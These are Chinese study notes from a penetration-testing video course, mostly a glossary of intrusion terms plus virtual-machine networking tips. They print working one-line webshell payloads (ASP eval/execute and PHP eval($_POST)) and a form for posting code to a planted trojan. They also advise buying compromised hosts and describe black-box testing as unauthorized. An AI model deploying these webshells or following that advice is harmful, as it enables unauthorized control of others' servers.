Cracer渗透视频课程学习笔记——基础知识(1)
-
- 常見的術(shù)語介紹
- 腳本(asp,php,jsp):可以編寫動態(tài)網(wǎng)站的,瀏覽器右擊查看不到,只能看到靜態(tài)代碼。
- html(css,js,html):解釋語言,靜態(tài)的,瀏覽器右擊查看源碼可以看到
- HTTP協(xié)議:定義一個(gè)瀏覽器通信標(biāo)注,http不安全,明文傳輸,可以嗅探到登錄密?????? 碼。(https,對數(shù)據(jù)進(jìn)行了加密相比較安全一點(diǎn))
- CMS(B/S):網(wǎng)站管理系統(tǒng)(DZ,dedecms,南方,帝國,織夢,discuz)
- MD5:加密哈希值,可以解密
- 肉雞:被黑客入侵并長期駐扎的計(jì)算機(jī)或者服務(wù)器。(自己抓三個(gè)肉雞就要入獄了,建議買肉雞,不要自己抓)
- 抓雞:利用使用大量程序漏洞,使用自動化方式獲取肉雞行為
- Webshell:通過Web入侵的一種腳本工具,可以據(jù)此對網(wǎng)站服務(wù)進(jìn)行一定程度的控制。
- 一句話【木馬】:通過向服務(wù)端提交一句簡短的代碼配合本地客戶端實(shí)現(xiàn)Webshell功能的木馬;
<%eval request("pass")%>
<%execute(request("pass"))%>
<%system()%>
request("pass")接收客戶機(jī)提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。
eval/execute 函數(shù)執(zhí)行客戶端命令的內(nèi)容
(注:一句話本身沒有危害性,最重要是看傳的是什么東西)
如:PHP的一句話木馬:
<?php eval($_POST[cracer]);?>
下面的代碼可以用POST的方式提交PHP語句,利用php腳本的各種函數(shù),就可以執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫、增刪改文件等等的各種功能。
<form method=post action=http://木馬地址>
<textarea name = cracer>
//這里寫php代碼
Phpinfo();
</textarea>
<input type=submit>
</form>
?
注:一句話木馬是從2010以后才出的,以前都是小馬大馬。
????? 小馬:用來上傳大馬
????? 大馬:用來提權(quán)用
????? 統(tǒng)稱為webshell,網(wǎng)站后門
-
- 提權(quán):操作系統(tǒng)低權(quán)限賬戶將自己提升為管理員權(quán)限使用的方法
- 后門:黑客為了對主機(jī)進(jìn)行長期的控制,在機(jī)器上種植一段程序或留下一個(gè)入口,方便下次進(jìn)入(最簡單的后門就是創(chuàng)建一個(gè)賬戶)
- 跳板:使用肉雞IP來試試共計(jì)其他目標(biāo),以便更好的隱藏自己的身份信息。
- 旁站入侵:由于一個(gè)服務(wù)器可能上面有許多的網(wǎng)站,可能現(xiàn)在想攻擊的網(wǎng)站沒有漏洞,但是假如有十個(gè)網(wǎng)站,有一個(gè)網(wǎng)站有漏洞,就可以通過這個(gè)網(wǎng)站入侵其他的網(wǎng)站。即同服務(wù)器下的王戰(zhàn)1入侵,入侵之后可以通過提權(quán)跨目錄等手段拿到目標(biāo)網(wǎng)站的權(quán)限。常見的旁站查詢工具有:WebRobot、御劍、明小子和web在線查詢等。
- C段入侵:即同C段下服務(wù)器入侵。如目標(biāo)ip為192.168.1.253入侵192.168.1.*的任意一臺機(jī)器,然后利用一些黑客工具嗅探獲取在網(wǎng)絡(luò)商傳輸?shù)母鞣N信息。常用的工具有:在Windows下有Cain,在UNIX環(huán)境下有Sniffit,Snoop,Tcpdump,Dsniff等。
- 滲透測試:
- 黑盒測試:在未授權(quán)的情況下,模擬黑客的共計(jì)方法和思維方式,在評估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)可能存在的安全風(fēng)險(xiǎn)。
黑盒測試不同于黑客入侵,并不等于黑站。黑盒測試考驗(yàn)的是綜合能力(OS、Datebase、Script、code、思路、社工)
思路余經(jīng)驗(yàn)積累往往決定成敗。
-
- 白盒測試:相對黑盒測試,白盒測試基本是從內(nèi)部發(fā)起
- 黑白盒的另一種說法:知道源代碼和不知道源代碼的滲透測試。這是,黑盒測試還是傳統(tǒng)的滲透測試,而白盒測試就偏向代碼審計(jì)。
小知識:POC:漏洞驗(yàn)證;EXP:漏洞利用。
?????? 關(guān)于虛擬機(jī)網(wǎng)絡(luò)部分知識點(diǎn):如下圖有三個(gè)類型,其中LAN一般用不著,常用上面三個(gè)
如果想要虛擬機(jī)上網(wǎng),一般選擇NAT模式,然后虛擬機(jī)Win+R輸入ncpa.cpl設(shè)置為自動獲取IP
?
在虛擬機(jī)編輯下面有一個(gè)虛擬網(wǎng)絡(luò)編輯器,這里可以設(shè)置虛擬機(jī)IP區(qū)域
這個(gè)時(shí)候用主機(jī)ping虛擬機(jī)是可以ping通的。但是如果是第二個(gè)僅主機(jī)模式,就是也可以ping通但是虛擬機(jī)無法上網(wǎng)的
?
?
?
如何讓外網(wǎng)的用戶訪問到虛擬機(jī)里面搭建的網(wǎng)站:核心把虛擬機(jī)網(wǎng)絡(luò)跟物理機(jī)放在同一個(gè)網(wǎng)絡(luò)中。
第一步選擇橋接模式,復(fù)制物理網(wǎng)絡(luò)。
學(xué)習(xí)搭建一個(gè)網(wǎng)站,網(wǎng)上下載的源碼在虛擬機(jī)中打開
然后在主機(jī)復(fù)制http://127.0.0.1:99/注意把127.0.0.1改成虛擬機(jī)地址,這個(gè)99保留是代表開放端口,不保留訪問不到
第二步,路由器設(shè)置端口映射,就可以外網(wǎng)訪問了
?
如果無法訪問可能是由于防火墻問題。
注:遇到問題
????????? 當(dāng)安裝好了Windows Server 2003時(shí)候連接不上網(wǎng)了?
其實(shí)如果輸入正確的網(wǎng)址就會進(jìn)入網(wǎng)站
?
?
?
?
?
?
總結(jié)
以上是生活随笔為你收集整理的Cracer渗透视频课程学习笔记——基础知识(1)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: tushare股票数据接口
- 下一篇: Cracer渗透视频课程笔记——基础知识